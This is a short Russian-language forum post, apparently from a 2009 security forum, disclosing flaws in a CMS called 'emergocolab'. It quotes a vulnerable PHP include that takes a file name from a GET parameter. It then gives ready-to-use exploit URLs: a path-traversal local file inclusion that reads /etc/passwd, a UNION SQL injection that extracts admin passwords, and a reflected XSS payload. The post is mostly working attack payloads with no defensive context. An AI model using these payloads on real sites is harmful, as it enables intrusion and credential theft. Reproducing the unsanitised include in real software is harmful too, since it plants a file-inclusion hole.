Показать сообщение отдельно

  #7  
Старый 07.04.2009, 21:03
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
С нами: 9010027

Репутация: 308
По умолчанию

emergocolab




LFI

Часть уязвимого кода:
Код:
 if (isset($_GET["sitecode"])) {
include ("conf/global.conf");
$_SESSION["sitecode"]=$_GET["sitecode"];
$_SESSION['sitefolder']='site';
include ("conf/".strtolower($_GET["sitecode"]).".conf");
Exp:
Код:
http://site.ru/index.php?sitecode=../../../../../../../etc/passwd%00

SQL Inj

Exp:
Код:
http://site.ru/viewprofile.php?p=-1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
XSS

Exp:http://site.ru/?pageid=<script>alert("antichat")</script>


Последний раз редактировалось [underwater]; 08.04.2009 в 10:55..
 
Ответить с цитированием